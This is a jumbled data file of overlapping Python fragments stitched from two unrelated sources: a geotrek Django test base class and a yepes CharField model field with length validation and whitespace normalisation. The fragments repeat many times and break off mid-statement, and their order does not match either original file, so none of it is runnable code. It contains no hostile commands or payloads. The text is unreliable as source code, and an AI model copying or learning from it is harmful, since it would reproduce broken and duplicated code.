"self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not",
"= '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self):",
"geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin,",
"# NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import",
"self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'):",
"# Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest",
"import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest):",
"ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from",
"<filename>geotrek/common/tests/__init__.py<gh_stars>0 # -*- encoding: utf-8 -*- from django.utils import translation from django.utils.translation import",
"valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data())",
"_(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response",
"Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from",
"obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login()",
"translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import",
"from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType",
"if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj =",
"mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object):",
"'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login()",
"test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj",
"geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin,",
"translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return",
"not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(),",
"super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology':",
"import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp()",
"from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate()",
"hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(),",
"not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure)",
"TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not",
"'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure,",
"from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class",
"_ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import",
"def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure)",
"hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last()",
"= self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure",
"FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests",
"get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model,",
"return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'):",
"class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology",
"https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories",
"class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix =",
"'/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if",
"test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302)",
"302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return",
"self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'},",
"self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def",
"MapEntityTest from geotrek.authent.factories import StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self):",
"django.utils import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from",
"import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA",
"CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is",
"-*- from django.utils import translation from django.utils.translation import ugettext as _ # Workaround",
"is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return self.login() response =",
"from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest,",
"return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data()) self.assertEqual(obj.structure,",
"self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure =",
"return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure)",
"from geotrek.common.models import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import",
"self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model, 'structure'): return self.login() structure = StructureFactory()",
"import FileType # NOQA from mapentity.tests import MapEntityTest from geotrek.authent.factories import StructureFactory from",
"{'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not hasattr(self.model, 'structure'): return",
"StructureFactory from geotrek.authent.tests import AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class",
"response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self):",
"self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if not hasattr(self.model,",
"setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/' def get_bad_data(self):",
"AuthentFixturesTest class TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix",
"django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType #",
"api_prefix = '/api/en/' def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def",
"from django.utils import translation from django.utils.translation import ugettext as _ # Workaround https://code.djangoproject.com/ticket/22865",
"= self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj = self.model.objects.last() self.assertEqual(obj.structure, self.user.profile.structure) def test_structure_is_not_changed(self): if",
"def get_bad_data(self): return {'topology': 'doh!'}, _(u'Topology is not valid.') def test_structure_is_set(self): if not",
"'structure'): return self.login() structure = StructureFactory() self.assertNotEqual(structure, self.user.profile.structure) obj = self.modelfactory.create(structure=structure) self.client.post(obj.get_update_url(), self.get_good_data())",
"as _ # Workaround https://code.djangoproject.com/ticket/22865 from geotrek.common.models import FileType # NOQA from mapentity.tests",
"TranslationResetMixin(object): def setUp(self): translation.deactivate() super(TranslationResetMixin, self).setUp() class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest): api_prefix = '/api/en/'",
"if not hasattr(self.model, 'structure'): return self.login() response = self.client.post(self._get_add_url(), self.get_good_data()) self.assertEqual(response.status_code, 302) obj"
] |
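The reconstructed geotrek test base above is meant to be subclassed once per entity. A minimal sketch of a concrete subclass, with a hypothetical Thing model and factory standing in for a real geotrek entity (the payload in get_good_data is likewise invented):

from geotrek.common.tests import CommonTest

from myapp.factories import ThingFactory  # hypothetical
from myapp.models import Thing            # hypothetical


class ThingViewsTest(CommonTest):
    # CommonTest reads these attributes in test_structure_is_set and
    # test_structure_is_not_changed above.
    model = Thing
    modelfactory = ThingFactory

    def get_good_data(self):
        # Valid POST payload for the create/update views the base tests hit.
        return {'name': 'A thing', 'topology': '{"lat": 0, "lng": 0}'}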
[
"**kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self):",
"'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField,",
"'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces':",
"<= 0)): return [ checks.Error( \"'max_length' must be None or a positive integer.\",",
"'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description =",
"False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return",
"' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value if",
"= kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if",
"greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else:",
"False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params = {",
"CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types)",
"'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length':",
"}) return (name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class':",
"def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or",
"'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args,",
"a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length",
"deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self,",
"from django.core.validators import MinLengthValidator from django.db import models from django.utils import six from",
"self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value",
"hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return",
"clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None,",
"'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces':",
"0)): return [ checks.Error( \"'max_length' must be None or a positive integer.\", hint=None,",
"django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms",
"if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not",
"[] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length,",
"'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is",
"= kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is",
"self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None:",
"increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description",
"a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self,",
"elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be",
"be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length,",
"= super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii':",
"value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper()",
"return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value if",
"import models from django.utils import six from django.utils.encoding import force_text from django.utils.translation import",
"django.db import models from django.utils import six from django.utils.encoding import force_text from django.utils.translation",
"from __future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from",
"or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and",
"params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value",
"def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower",
"checks.Error( \"'max_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', )",
"if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <=",
"True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params",
"elif self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii: value",
"be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ]",
"description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii =",
"check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def",
"isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None",
"self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0):",
"'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params =",
"is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [",
"if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs)",
"= kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length =",
"<= 0): return [ checks.Error( \"'min_length' must be None or a positive integer.\",",
"= kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces =",
"kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces':",
"CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator",
") ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return",
"{ 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length,",
"self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None:",
"self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces",
"} params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return",
"'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return []",
"def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields')",
"path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset,",
"import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not",
"yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators",
"None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors =",
"return value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif",
"check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char',",
"obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String')",
"isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces:",
"'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return",
"value.strip() if not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower:",
"super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args,",
"**kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper':",
"self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs))",
"(not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be",
"elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must",
"import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField from",
"None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types)",
"import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import",
"checks from django.core.validators import MinLengthValidator from django.db import models from django.utils import six",
"] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return []",
"**kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <=",
"False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True)",
"import MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding import",
"self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease",
"self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None or a positive",
"hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length",
"from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length",
"not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif",
"value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower()",
"'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name,",
"value is None: return value if not isinstance(value, six.string_types): value = force_text(value) if",
"None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if",
"<reponame>samuelmaudo/yepes # -*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks",
"not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors",
"must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else:",
"return [ checks.Error( \"'min_length' must be None or a positive integer.\", hint=None, obj=self,",
"not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value =",
"isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must be None",
"variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True,",
"self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces,",
"clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None",
"value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value =",
"check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length",
"or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField):",
"cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', )",
"= { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length':",
"from django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import",
"] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot",
"not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error(",
"obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is",
"None: return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value",
"return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error(",
"= force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip()",
"None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return []",
"**kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length",
"or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None or a",
"or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def",
"from django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as",
"__init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower =",
"args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset':",
"super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not",
"= value.strip() if not value: return value if self.force_ascii: value = unidecode(value) if",
"errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name,",
"name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs,",
"import force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms from",
"'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs):",
"value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = '",
"or self.min_length <= 0): return [ checks.Error( \"'min_length' must be None or a",
"errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs =",
"return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase",
"id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def",
"return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField,",
"\"'max_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ]",
"(not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must be",
"path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False,",
"id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None:",
"MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding import force_text",
"self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length))",
"None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [",
"six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater than",
"than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return",
"from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from",
"and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\",",
"be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return",
"six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value",
"yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not",
"six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must be None or",
"kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset",
"= kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces =",
"self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower':",
"self).formfield(**params) def to_python(self, value): if value is None: return value if not isinstance(value,",
"yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is",
"-*- from __future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator",
"integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length):",
"= kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper =",
"positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs):",
"0): return [ checks.Error( \"'min_length' must be None or a positive integer.\", hint=None,",
"self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper",
"self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length",
"def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types)",
"\"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113',",
"self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value:",
"and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must",
"args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii':",
"'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params)",
